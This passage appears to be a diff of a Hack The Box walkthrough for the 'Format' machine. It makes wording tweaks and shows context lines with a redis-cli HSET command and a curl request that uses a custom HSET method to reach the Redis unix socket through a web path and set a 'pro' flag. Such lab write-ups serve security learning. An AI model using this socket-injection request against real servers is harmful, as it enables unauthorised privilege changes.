blnknlights/blnknlights.github.io/htb/machines/format/format.md

 redis-cli -s unix:/var/run/redis/redis.sock HSET asdf pro true
 ```

-And it is interesting to note that apparently curl will let you do that
+And it is interesting to note that apparently curl will let you do that...
-Let's try it out
+So let's try it out
 ```bash
 curl -XHSET http://microblog.htb/static/unix:/var/run/redis/redis.sock:asdf%20pro%20true%20/asdf
 <html>